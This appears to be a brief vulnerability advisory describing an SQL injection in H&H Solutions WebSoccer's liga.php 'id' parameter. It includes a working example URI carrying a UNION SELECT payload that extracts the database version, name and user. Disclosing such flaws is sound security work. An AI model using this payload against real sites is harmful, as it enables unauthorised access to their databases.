• info
• discussion
• exploit
• solution
• references

H&H Solutions WebSoccer 'id' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/liga.php?id=1'UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5/*